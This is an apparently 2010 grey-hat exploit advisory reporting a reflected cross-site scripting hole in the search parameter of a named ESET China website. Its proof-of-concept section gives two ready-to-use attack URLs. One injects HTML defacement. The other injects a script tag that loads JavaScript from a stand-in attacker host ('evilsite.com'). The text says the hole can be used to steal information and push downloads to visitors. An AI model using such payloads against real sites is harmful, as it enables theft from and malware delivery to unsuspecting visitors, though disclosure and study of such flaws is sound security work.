.___________  ________  http://www.nod32.com.cn
____   ____   __| _/\_____  \ \_____  \    ____   ____
/    \ /  _ \ / __ |   _(__  <  /  ____/   _/ ___\ /    \
|   |  (  <_> ) /_/ |  /       \/       \   \  \___|   |  \
|___|  /\____/\____ | /______  /\_______ \ / \___  >___|  /
\/            \/        \/         \/ \/   \/     \/
> Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com
> Vulnerability: Cross Site Scripting

————————-
1. INFORMATION          |
————————-
Site: http://www.nod32.com.cn
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

————————-
2. DESCRIPTION          |
————————-

http;//www.nod32.com.cn suffers a remote cross site scripting exploit, which can be used to
scam information and to execute malicious javascript which might remotely download a file to the
victim’s PC.

————————-
3. PROOF OF CONCEPT     |
————————-
Display a message using HTML:

http://www.eset.com.cn/default.php?id=181&p=24&searchword=%3Ch1%3EXSS+-+Sora%3C%2Fh1%3E%3E%22%3Ctitle%3E%3Cmarquee%3EXSS%20by%20Sora%20-%20IMPROVE%20YOUR%20SECURITY%20-%20greyhathackers.wordpress.com&btnG=

Execute malicious code:
http://www.eset.com.cn/default.php?id=181&p=24&searchword=<script src=”http://www.evilsite.com/foo.js”><h2>Error</h2>&btnG=

————————-
4. GREETZ               |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

————————-
5. CONTACT              |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 – http://greyhathackers.wordpress.com – Sora